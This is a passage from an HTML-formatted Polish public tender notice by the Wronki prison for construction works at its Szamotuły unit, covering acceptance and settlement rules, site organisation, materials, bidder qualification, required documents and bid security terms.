odbiór końcowy – dotyczący sprawdzenia technicznego oraz rozliczenia całości przedmiotu zamówienia,e) odbiór ostateczny tj. po okresie gwarancji – dotyczy całości przedmiotu zamówienia eksploatowanego w okresie gwarancyjnym.Roboty budowlane będą odbierane przez osobę upoważnioną ze strony zamawiającego do zarządzania umową.Sprawdzaniu i kontroli będą podlegały:a) użyte wyroby budowlane i uzyskane w wyniku robót budowlanych elementy obiektu – w odniesieniu do ich parametrów oraz ich zgodności z dokumentami budowy,b) jakość wykonania i dokładność prac wykończeniowych,c) prawidłowość funkcjonowania zamontowanych urządzeń i wyposażenia,d) poprawność połączeń i sprawność (pomiary) instalacji.1.4 ROZLICZENIEZamawiający ustanowił ryczałtowe wynagrodzenie dla wykonawcy. Dla potrzeb odbioru i rozliczania robót budowlanych, zamawiający ustala następujące zasady dokonania odbioru częściowego oraz końcowego i rozliczenia przedmiotu zamówienia:1. płatność za wykonanie przedmiotu zamówienia odbędzie się na podstawie protokołu odbiorów częściowych i końcowego potwierdzającego wykonanie bezusterkowe i zgodne z wymaganą jakością, przedmiotu umowy lub po usunięciu ewentualnych usterek,2. Wykonawca wykona i przekaże uzgodnioną z zamawiającym dokumentację projektową w ciągu 30 dni kalendarzowych od podpisania umowy,3. gotowość do uzgodnienia i przekazania dokumentacji projektowej Wykonawca zgłosi pisemnie Zamawiającemu. Zamawiający niezwłocznie wyznaczy termin odbioru nie dłuższy niż 14 dni roboczych od dnia otrzymania zgłoszenia,4. gotowość do odbiorów częściowych i końcowego przedmiotu umowy Wykonawca zgłosi pisemnie Zamawiającemu. Za datę zgłoszenia uważa się dzień wpływu do Zamawiającego pisemnego zgłoszenia wraz z kopią strony dziennika budowy zawierającą wpis kierownika budowy. Po otrzymaniu niniejszego dokumentu Zamawiający wciągu 21 dni roboczych wyznaczy i rozpocznie czynności związane z odbiorem robót. 5. z czynności odbioru częściowego lub końcowego sporządza się protokół, który powinien zawierać ustalenia poczynione w toku odbioru,6. stwierdzone w toku odbioru usterki ujmuje się w wykazie załączonym do protokołu z jednoczesnym określeniem terminu ich usunięcia i określeniem osób upoważnionych do ich odbioru,7. wykonawca zobowiązany jest do zawiadomienia Zamawiającego o usunięciu wad i zaproponowania terminu odbioru zakwestionowanych uprzednio robót. Usunięcie wad powinno być potwierdzone protokółem.W trakcie realizacji robót budowlanych prowadzony będzie dziennik budowy, prowadzony zgodnie z Rozporządzeniem Ministra Infrastruktury z 25 kwietnia 2018 r., w sprawie dziennika budowy, montażu i rozbiórki, tablicy informacyjnej oraz ogłoszenia zawierającego dane dotyczące bezpieczeństwa pracy i ochrony zdrowia (Dz.U. z 2018 r. poz. 963). W dzienniku budowy prowadzona będzie cała korespondencja między zamawiającym a wykonawcą dotycząca realizacji, uzgodnień, wniosków i zaleceń, zgłoszeń, kontroli i odbiorów robót budowlanych objętych zakresem przedmiotu zamówienia. Dziennik budowy dostarczy zamawiający w chwili przekazania wykonawcy placu budowy. Będzie on przechowywany na terenie Zakładu Karnego we Wronkach Oddział Zewnętrzny w Szamotułach, pod opieką wyznaczonej przez Zamawiającego osoby, w sposób dostępny dla wszystkich osób uprawnionych do dokonywania w nim wpisów, w tym obu stron umowy. 1.5 PLAC BUDOWY• Wykonawca będzie zobowiązany do wykonywania i utrzymywania w stanie nadającym się do użytku oraz do likwidacji wszystkich robót tymczasowych, niezbędnych do realizacji przedmiotu zamówienia. Zamawiający nie będzie opłacał robót tymczasowych takich jak: urządzenia do transportu pionowego, zabezpieczenia przed opadami, transport, drogi tymczasowe itp.• W ramach zamówienia nie występuje potrzeba robót związanych z nowym zagospodarowaniem terenu. W następstwie powyższego roboty dotyczące przygotowania terenu ograniczą się do robót związanych z uwzględnieniem czasowego placu budowy oraz zabezpieczenia terenu wokół obiektu na czas wykonywania robót budowlanych.• W ramach zamówienia Wykonawca zobowiązany, jest w porozumieniu zZamawiającym, zorganizować i zabezpieczyć plac budowy zgodnie z wytycznymi nr 1/2019 Dyrektora Generalnego Służby Więziennej z dnia 17.06.2019 r. w sprawie wymagań technicznych i ochronnych dla pawilonów zakwaterowania osadzonych w jednostkach organizacyjnych Służby Więziennej.• W końcowej fazie robót Wykonawca usunie z terenu wszystkie pozostałości włącznie z ewentualnymi urządzeniami placu budowy i odtworzy lub naprawi zniszczone elementy zagospodarowania terenu i obiektów udostępnionych Wykonawcy na czas robót. • Pozostałe w wyniku prac inwestycyjnych nieprzydatne materiały rozbiórkowe, Wykonawca robót, w ramach wykonywania przedmiotu zamówienia, zmagazynuje (w uzgodniony sposób) z Zamawiającym na placu budowy, a następnie usunie z terenu jednostki i zutylizuje zgodnie z obowiązującymi przepisami. Zamawiający zastrzega sobie prawo zatrzymania części materiałów rozbiórkowych. • O zamiarze zatrzymania części materiałów rozbiórkowych Zamawiający powiadomi Wykonawcę niezwłocznie po ich zdemontowaniu i zagospodaruje je w ciągu 3 dni kalendarzowych od ich zdemontowania. Przekazanie materiałów zostanie udokumentowane pisemnym protokołem. • Odzyskany podczas prac demontażowych złom stanowi własność Zakładu Karnego we Wronkach. Należy złożyć go w miejscu uzgodnionym z Zamawiającym na terenie zakładu. Przekazanie złomu zostanie udokumentowane protokołem.• Podlegające demontażowi urządzenia stanowią własność Zakładu Karnego we Wronkach i należy je zdemontować z należytą starannością zabezpieczając przed uszkodzeniem oraz złożyć w miejscu uzgodnionym z właścicielem na terenie jednostki. Przekazanie zdemontowanych urządzeń zostanie udokumentowane pisemnym protokołem.• Dla potrzeb transportu materiałów budowlanych Zamawiający udostępni na niezbędny do tego celu okres czasu istniejące na terenie jednostki niezbędne ciągi komunikacyjne. Wykonawca jest zobowiązany uzgodnić z Zamawiającym miejsce i sposób montażu oraz wykorzystania własnych urządzeń, przy czym Zamawiający zastrzega sobie prawo odmowy ich wykorzystania, jeżeli mogłoby to w sposób istotny naruszać ustalony porządek wewnętrzny i bezpieczeństwo jednostki.1.6 MATERIAŁY I URZĄDZENIAa) Materiały, gotowe wyroby i urządzenia użyte przy realizacji zamówienia powinny spełniać wymogi określone przez producentów tych wyrobów zawarte w dokumentacjach technicznych i instrukcjach wydanych dla tych wyrobów, a także odpowiadać wymogom postawionym w dokumentacji projektowej. Użyte w opisie niniejszego zamówienia nazwy własne materiałów, sprzętów, urządzeń, systemów stanowią jedynie wzorzec jakościowy i są podane w celu określenia wymogów jakościowych im stawianych. Zamawiający dopuszcza zastosowanie innych, równoważnych materiałów, urządzeń, sprzętów i systemów pod warunkiem zachowania, co najmniej to samych parametrów technicznych. Zastosowanie innych materiałów i urządzeń jako równoważne, należy poprzedzić zapytaniem do Zamawiającego wraz z podaniem producenta, nazwy, ty u i charakterystycznych parametrów materiałów i urządzeń, które Wykonawca chce zastosować jako równoważne. Jeżeli Zamawiający w udzielonej odpowiedzi nie potwierdzi możliwości za stosowania zgłoszonego materiału lub urządzenia, oznaczać to będzie, że nie jest on równoważny do zaprojektowanego i nie jest możliwe jego zastosowanie. b) W trakcie realizacji umowy Wykonawca może wystąpić do Zamawiającego o zgodę na zastosowanie innych produktów, materiałów i urządzeń pod warunkiem potwierdzenia, iż zamieniane materiały, wyroby lub urządzenia są równoważne, a istotne parametry nie ulegną pogorszeniu. Zamawiający zastrzega sobie prawo odmowy zamiany materiałów, wyrobów i urządzeń w stosunku do przewidzianych w dokumentacji projektowej zamówienia na etapie realizacji umowy. c) Zastosowanie równoważnych materiałów, sprzętów, urządzeń i systemów, na każdym etapie zamówienia, oprócz zgody Zamawiającego, wiąże się z uzyskaniem zgody Wojewódzkiego Konserwatora Zabytków w Poznaniu.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45313100-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331200-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71220000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-11-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający opiera się w tym zakresie na oświadczeniu Wykonawcy i nie precyzuje tego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający opiera się w tym zakresie na oświadczeniu Wykonawcy i nie precyzuje tego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna, za spełniony powyższy warunek, jeżeli wykonawca przedstawi:Wykonawca musi wykazać, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną robotę budowlaną polegającą na budowie windy. Wykaz wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane, z załączeniem dowodów czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawcę nie jest w stanie uzyskać tych dokumentów - inne dokumenty w zakresie informacji określonych w załączniku nr 6 do siwz;</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Wykonawca ma obowiązek złożenia oferty na formularzu ofertowym (wzór formularza ofertowego stanowi załącznik nr 1 do siwz); 1.2. W celu wskazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia oraz spełniania warunków udziału w postępowaniu określonych przez Zamawiającego w §6 niniejszej SIWZ do oferty należy dołączyć aktualne na dzień aktualne na dzień składania ofert OŚWIADCZENIA, zgodnie ze wzorem stanowiące załączniki nr 2.1 i nr 2.2 do siwz (oświadczenie art. 25a ustawy Prawo zamówień publicznych). Informacje zawarte w oświadczeniu stanowi wstępne potwierdzeni, że Wykonawca nie podlega wykluczeniu z postępowania oraz spieniania warunki udziału w postępowaniu.1.3. Wykonawca obowiązek wskazanie części zamówienia, której zamierza zlecić podwykonawcy na formularzu ofertowym stanowiący załącznik nr 1 do siwz.1.4. W przypadku podmiotów występujących wspólnie pełnomocnictwo w oryginale do złożenia oferty lub złożenia oferty i podpisania umowy w sprawie zamówienia publicznego. Dołączone do oferty pełnomocnictwo powinno być jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania oraz wymienić wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia.1.5. W przypadku gdy upoważnienie do podpisania oferty nie wynika z dokumentów rejestrowanych do oferty należy załączyć stosowne pełnomocnictwo w oryginale do złożenia oferty. Dołączone do oferty pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania.1.6. Potwierdzenie wniesienia wadium1.7. Na podstawie art. 24 ust. 11 ustawy Pzp. każdy Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy – na druku, który zostanie załączony do w/w informacji lub według załączonego wzoru. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia o przynależności lub braku przynależności do grupy kapitałowej stanowi załącznik nr 5 do siwz. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Do złożenia poniższych dokumentów i oświadczeń będzie zobowiązany tylko Wykonawca, którego oferta zostanie oceniona najwyżej, po wezwaniu przez Zamawiającego w trybie art. 26 ust. 2 ustawy w związku z art. 24 aa ust. 1 ustawy:2.1. aktualne na dzień złożenia oświadczenie potwierdzające okoliczności, o których mowa w art. 25 ust. 1 w związku z art. 22 ust. 1 pkt 2) ustawy (na załączonym do wezwania druku lub według załączonego wzoru) – w celu potwierdzenia warunków udziału w postępowaniu dotyczących kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, sytuacji ekonomicznej i finansowej oraz zdolności technicznej lub zawodowej (załącznik nr 2.1 do siwz).2.2. aktualne na dzień złożenia oświadczenie potwierdzające okoliczności, o których mowa w art. 25 ust. 1 ustawy (na załączonym do wezwania druku lub według załączonego wzoru) – w celu potwierdzenia braku podstaw wykluczenia z postępowania (załącznik nr 2.2 do siwz).2.3. jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (załącznik nr 4 do siwz). 2.4. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykaz musi potwierdzać spełnianie warunków określonych w § 6 ust. 2.3 w niniejszej siwz. Wzór powyższego wykazu określa załącznik nr 6 do siwz.3. W przypadku wskazania przez Wykonawcę w celu spełniania warunków udziału waluty innej niż polska (PLN), w celu jej przeliczenia stosowany będzie średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych na portalu internetowym Urzędu Zamówień Publicznych.6. FORMA OŚWIADCZEŃ/DOKUMENTÓW: 6.1. Zgodnie z § 14 ust. 1 Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia, ww. oświadczenia dotyczące Wykonawcy należy złożyć w oryginale. 6.2. Pozostałe dokumenty, inne niż oświadczenia, o których mowa powyżej składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. 6.3. Poświadczenie za zgodność z oryginałem następuje w formie pisemnej lub formie elektronicznej.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">a)	wypełniony formularz ofertowy – przygotowany zgodnie z załącznikiem nr 1 do siwz, z wypełnionymi wszystkimi rubrykami,b)	oświadczenia o braku podstaw wykluczenia z postępowania o udzielenie zamówienia oraz spełniania warunków udziału w postępowaniu określonych przez Zamawiającego w § 6 niniejszej siwz- przygotowany zgodnie z załącznikami nr 2.1 i 2.2 do siwz, c)	wskazanie części zamówienia, której Wykonawca zamierza zlecić podwykonawcy o których mowa w § 8 pkt. 1.3. w niniejszej SIWZd)	ewentualne pełnomocnictwa – jeżeli potrzeba ich złożenia wynika z zapisów § 8 pkt. 1.4. i 1.5. w niniejszej SIWZe)	potwierdzenie wniesienie wadium o którym mowa w § 10 pkt. 5 i pkt.7 w niniejszej SIWZ</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.	Oferta winna być zabezpieczona wadium w wysokości 4.000,00 zł (słownie: cztery tysiące złoty, 00/100). 2.	Wadium należy wnieść najpóźniej w terminie wyznaczonym na złożenie oferty tj. do dnia 31.07.2020 roku, godz. 10:00. 3.	Wykonawca może wnieść wadium w:•	pieniądzu,•	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,•	gwarancjach bankowych,•	gwarancjach ubezpieczeniowych,•	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz.U. 2020 r. poz. 299).4. W przypadku wnoszenia wadium w pieniądzu Wykonawca jest zobowiązany wpłacić wadium przelewem na nieoprocentowany rachunek: BP Oddział Okręgowy Poznań 57 1010 1469 0014 6913 9120 00005.	Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w wyznaczonym terminie składania ofert znajduje się na wskazanym rachunku bankowym Zamawiającego. Do oferty należy dołączyć oryginał lub potwierdzoną za zgodność z oryginałem przez Wykonawcę kopię polecenia przelewu. 6.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.7.	W przypadku wadium wnoszonego w innej formie niż w pieniądzu, Wykonawca załączy do oferty oryginał dokumentu. Zaleca się zamieścić dokument wadialny w taki sposób, aby jego zwrot nie naruszył integralności oferty wraz z załącznikami (np. umieszczony w koszulce, co pozwoli na swobodne oddzielnie wadium od reszty dokumentów). Z treści dokumentu (gwarancji, poręczenia) winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy Prawo Zamówień Publicznych.7.1. wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres zawiązania ofertą. W przypadku wniesienia wadium w formie gwarancji lub poręczenia koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium.7.2. gwarancja lub poręczenia musi zawierać w swojej treści nieodnawialne i bezwarunkowa zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium.7.3. Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, ze co innego wynika z przepisów prawa.8. Oferta nie zabezpieczona akceptowaną formą wadium spowoduje odrzucenie oferty wykonawcy na podstawie art. 89 ust. 1 pkt. 7b ustawy Pzp.9. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a) ustawy Prawo zamówień publicznych. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego wniesieniu zabezpieczenia należytego wykonania umowy. 10. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium, na podstawie ww. ppkt. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.12. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z ewentualnymi odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.13. Zamawiający zatrzymuje wadium jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a Pzp, z przyczyn leżących po jego stronie nie złożył dokumentów lub oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 Pzp, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.14. Zamawiający zatrzymuje wadium, jeżeli wykonawca, którego oferta została wybrana:14.1 odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;14.2 nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;14.3 zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.15. W przypadku Wykonawców wspólnie ubiegających się o zamówienie – jeżeli wadium wniesione zostaje w innej formie niż pieniężna - dokument wadialny musi wymieniać wszystkich konsorcjantów łącznie. W przeciwnym wypadku Zamawiający uzna, iż oferta nie jest prawidłowo zabezpieczona wadium, co spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt. 7b) ustawy Pzp.16. Powołując się na zapisy art. 53 dyrektywy 2014/24/UE, Zamawiający dopuszcza złożenie wadium określonego w art. 45 ust. 6 pkt. 2-5 ustawy zarówno w formie elektronicznej, jak i w formie papierowej w terminie zgodnie z ustawą na adres: Zakład Karny we Wronkach, ul. Partyzantów 1, 64-510 Wronki. Zapis niniejszy służy zachowaniu uczciwej konkurencji i ma na celu umożliwienie złożenia oferty Wykonawcom, którzy nie posiadają wersji elektronicznej oraz Wykonawcom, którzy dysponują wadium w takiej wersji, a jednocześnie nie stoi w sprzeczności z ustawą Prawo zamówień publicznych oraz z ustawą Prawo bankowe. </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span 